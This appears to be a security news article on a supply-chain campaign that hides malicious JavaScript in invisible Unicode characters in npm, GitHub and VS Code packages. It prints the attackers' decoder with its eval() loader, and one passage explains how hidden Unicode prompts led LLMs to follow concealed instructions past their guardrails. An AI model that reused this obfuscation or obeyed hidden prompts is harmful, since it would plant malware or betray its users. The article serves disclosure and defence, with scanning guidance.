Invisible Unicode Characters Used to Hide Malicious Payloads

by Priyanka Patel

Developers and security researchers are sounding the alarm over a sophisticated supply-chain attack using invisible code that allows malicious payloads to hide in plain sight. By exploiting a quirk in the Unicode standard, attackers have managed to embed executable instructions within software repositories that appear as empty lines or whitespace to human reviewers and many automated security tools.

The campaign has targeted major hubs of the open-source ecosystem, including GitHub, the npm registry, and the VS Code marketplace. Security researchers at Aikido identified at least 151 malicious packages using this technique, though they warn this figure likely represents only a small fraction of the total campaign, as many packages were deleted shortly after being uploaded.

For those of us who have spent years in the trenches of software engineering, the most unsettling part of this breach is its simplicity. It doesn’t rely on a complex zero-day exploit in a kernel. Instead, it leverages the very way computers interpret text, creating a gap between what a human sees on a screen and what a JavaScript interpreter executes in the background.

How Invisible Unicode Characters Bypass Human Review

The core of the attack relies on Private Use Areas (PUA). In the Unicode specification, these are ranges of code points reserved for private use: placeholders that let organizations define their own characters, symbols, or emojis that aren’t part of the universal standard.

Because these characters have no standardized visual representation, most text editors and IDEs render them as nothing at all. When a developer performs a code review, or when a static analysis tool scans for vulnerabilities, the affected spans appear as blank lines or empty strings. To a JavaScript interpreter, however, these code points are distinct, readable values that can be manipulated and, once decoded, executed.
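The gap between what is drawn and what is stored can be seen in a few lines of Node.js. The following is a minimal sketch, not taken from the campaign: the variable names are hypothetical, and the two code points are simply picked from the ranges that the decoder shown later in this article checks for.

```javascript
// Build a string from two invisible code points.
// Most editors draw nothing for it, yet it is not an empty string.
const hidden = String.fromCodePoint(0xFE00, 0xE0100);

// Spreading a string walks it by code point, not by UTF-16 code unit.
const codePoints = [...hidden].map(ch =>
  ch.codePointAt(0).toString(16).toUpperCase()
);

console.log(hidden.length);  // 3: one BMP code unit plus one surrogate pair
console.log(codePoints);     // [ 'FE00', 'E0100' ]
console.log(hidden === '');  // false
```

A reviewer looking at the rendered string sees nothing, while the interpreter sees two distinct values it can do arithmetic on.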

Comparison of Code Perception: Human vs. Machine

Perspective | Visual/Logical Interpretation | Result
Human Developer | Whitespace or empty backticks (``) | Code appears clean/empty
Static Analysis Tool | Non-printable characters/blank lines | No malicious patterns detected
JS Interpreter | Specific Unicode code points | Executable malicious payload

From AI Prompt Injection to Malware Payloads

This technique is not entirely new, but its application has evolved rapidly. Earlier in 2024, hackers began using invisible Unicode characters to conceal malicious prompts fed to Large Language Models (LLMs). Because AI engines process tokens rather than visual pixels, they could read and follow the hidden instructions, effectively bypassing the safety guardrails designed to prevent harmful outputs.

The transition from AI manipulation to traditional malware is a significant escalation. Attackers are now applying the same logic to software dependencies. In the current campaign, the malicious code is not executed directly as a script but is instead hidden within a string. A small, seemingly innocent decoder function then extracts the real bytes from these invisible characters and passes them to the eval() function, which executes the resulting code at runtime.

The following code snippet illustrates the decoder used in these attacks:

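// Map each invisible code point back to a byte value; drop everything else.
const s = v => [...v].map(w => (
  w = w.codePointAt(0),
  w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
  w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
  null
)).filter(n => n !== null);

// The backtick string looks empty but carries the payload.
eval(Buffer.from(s(``)).toString('utf-8'));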

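As Aikido explained, the backtick string passed to the function s() looks empty in every viewer, but it’s actually packed with invisible characters that, once decoded, produce a full malicious payload. Note that the two ranges the decoder checks, U+FE00 to U+FE0F and U+E0100 to U+E01EF, are formally Unicode’s Variation Selectors and Variation Selectors Supplement blocks rather than Private Use Area ranges; they also typically render as nothing on their own.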
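When triaging a suspicious package, the same mapping can be used to look at the hidden bytes without running them. The sketch below is an illustration under stated assumptions, not Aikido's tooling: the function name decodeHiddenBytes and the sample string are hypothetical, and the mapping is copied from the decoder above (U+FE00 to U+FE0F become bytes 0 to 15, U+E0100 to U+E01EF become bytes 16 to 255).

```javascript
// Same mapping as the decoder above, written out for readability:
//   U+FE00..U+FE0F    -> byte values 0..15
//   U+E0100..U+E01EF  -> byte values 16..255
function decodeHiddenBytes(text) {
  const bytes = [];
  for (const ch of text) {
    const cp = ch.codePointAt(0);
    if (cp >= 0xFE00 && cp <= 0xFE0F) {
      bytes.push(cp - 0xFE00);
    } else if (cp >= 0xE0100 && cp <= 0xE01EF) {
      bytes.push(cp - 0xE0100 + 16);
    }
    // Any other character carries no hidden byte and is skipped.
  }
  return Buffer.from(bytes);
}

// Hypothetical sample: two invisible characters that encode the bytes of "hi".
const sample = String.fromCodePoint(0xE0158, 0xE0159);

// Print the decoded text for inspection instead of passing it to eval().
const decoded = decodeHiddenBytes(sample).toString('utf-8');
console.log(decoded); // hi
```

Replacing eval() with a print statement is the only change in behavior; it turns the attacker's loader into a way to read what would have been executed.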

The Mechanics of the Breach: From GitHub to Solana

The goal of these invisible payloads is typically credential and asset theft. In several analyzed incidents, the decoded payload acted as a “dropper,” fetching and executing a second-stage script. Interestingly, attackers have used the Solana blockchain as a delivery channel for these second-stage scripts, leveraging the decentralized nature of the network to host malicious code that is hard for centralized authorities to take down.

Once active, the malware is capable of stealing sensitive data, including:

  • Cryptocurrency tokens and private keys.
  • Environment variables containing API keys and secrets.
  • User credentials stored within the local system.

The use of the VS Code marketplace is particularly concerning, as it places the malicious code directly into the developer’s primary workspace, potentially granting the attacker access to every project the developer is working on.

Hardening the Software Supply Chain

This attack highlights a critical weakness in the current software development lifecycle: the over-reliance on visual inspection and basic static analysis. To defend against invisible-code supply-chain attacks like this one, developers must adopt a more rigorous approach to dependency management.

Security experts recommend several immediate steps to mitigate risk:

  • Strict Dependency Auditing: Carefully inspect new packages and their dependencies before integration. This includes checking for “typosquatting,” where a malicious package has a name very similar to a popular legitimate one.
  • Enhanced Tooling: Use security tools that can detect non-printable Unicode characters or alert users when eval() is used on dynamically generated strings.
  • Least Privilege Access: Ensure that development environments and CI/CD pipelines run with the minimum necessary permissions to limit the impact of a successful breach.
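As a rough illustration of the "Enhanced Tooling" recommendation above, a scanner for invisible characters can be quite small. This is a minimal sketch rather than a production tool: the names SUSPICIOUS_RANGES, classify, scanSource, and hasEvalCall are hypothetical, the list of ranges is an assumption and not exhaustive, and the eval() check is a naive pattern match that will also fire on comments and string literals.

```javascript
// Code point ranges treated as suspicious in this sketch (an assumption,
// not an exhaustive list of invisible characters).
const SUSPICIOUS_RANGES = [
  [0x200B, 0x200D, 'zero-width character'],
  [0xE000, 0xF8FF, 'private use area'],
  [0xFE00, 0xFE0F, 'variation selector'],
  [0xE0100, 0xE01EF, 'variation selector supplement'],
  [0xF0000, 0xFFFFD, 'supplementary private use area A'],
  [0x100000, 0x10FFFD, 'supplementary private use area B'],
];

// Returns a label for a suspicious code point, or null if it is not listed.
function classify(cp) {
  const hit = SUSPICIOUS_RANGES.find(([lo, hi]) => cp >= lo && cp <= hi);
  return hit ? hit[2] : null;
}

// Returns one finding per suspicious code point, with 1-based line and column.
// Columns count code points, not UTF-16 code units.
function scanSource(source) {
  const findings = [];
  source.split('\n').forEach((line, index) => {
    let column = 1;
    for (const ch of line) {
      const cp = ch.codePointAt(0);
      const kind = classify(cp);
      if (kind) {
        const hex = cp.toString(16).toUpperCase().padStart(4, '0');
        findings.push({ line: index + 1, column, codePoint: 'U+' + hex, kind });
      }
      column += 1;
    }
  });
  return findings;
}

// Naive check for an eval( call anywhere in the source text.
function hasEvalCall(source) {
  return /\beval\s*\(/.test(source);
}

// Hypothetical input: a template literal that looks empty but is not.
const sampleSource =
  'const a = 1;\n' +
  'eval(s(`' + String.fromCodePoint(0xFE00, 0xE0158) + '`));';

const report = scanSource(sampleSource);
console.log(report);
console.log(hasEvalCall(sampleSource)); // true
```

One design caveat: U+FE0F is also used legitimately in emoji sequences, so a real tool would likely need an allowlist or a threshold (for example, flagging only long runs of such characters) to keep false positives manageable.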

As AI continues to be used to generate more convincing—and potentially malicious—code, the risk of “legitimate-looking” packages will only grow. The ability to hide payloads in the gaps of the Unicode standard is a reminder that in cybersecurity, what you don’t see is often the greatest threat.

The security community is currently monitoring for new variants of these PUA-based attacks. Further updates are expected as repository maintainers at GitHub and npm implement more robust scanning for invisible Unicode characters across their platforms.

Do you use automated tools to scan your dependencies for hidden characters? Share your experience or questions in the comments below.
